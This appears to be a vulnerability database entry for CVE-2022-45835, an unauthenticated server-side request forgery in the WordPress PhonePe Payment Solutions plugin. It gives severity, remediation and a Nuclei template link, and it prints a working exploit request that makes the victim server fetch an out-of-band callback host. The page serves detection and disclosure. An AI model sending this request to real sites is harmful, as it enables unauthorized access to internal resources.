🔙 목록으로 돌아가기

CVE-2022-45835: WordPress PhonePe Payment Solutions <=1.0.15 - Server-Side Request Forgery

TitleWordPress PhonePe Payment Solutions <=1.0.15 - Server-Side Request Forgery
Authortheamanrawat
SeverityHigh
ImpactAn attacker can exploit this vulnerability to send arbitrary HTTP requests from the server, potentially leading to unauthorized access to internal resources or performing actions on behalf of the server.
RemediationFixed in version 2.0.0.
CVSS Score7.5
EPSS Score0.64289
CVE IDCVE-2022-45835
CWE IDCWE-918
Tags cve cve2022 ssrf wordpress wp-plugin wp phonepe-payment-solutions unauth oast phonepe vkev vuln

🔍 Vulnerability Description

WordPress PhonePe Payment Solutions plugin through 1.0.15 is susceptible to server-side request forgery. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

🌐 HTTP Request

GET /?phonepe_action=curltestPhonePe&url=http://d5jn0u9le0o4ui0dsb10tnpejiajbhncd.oast.fun HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-45835.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-45835.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A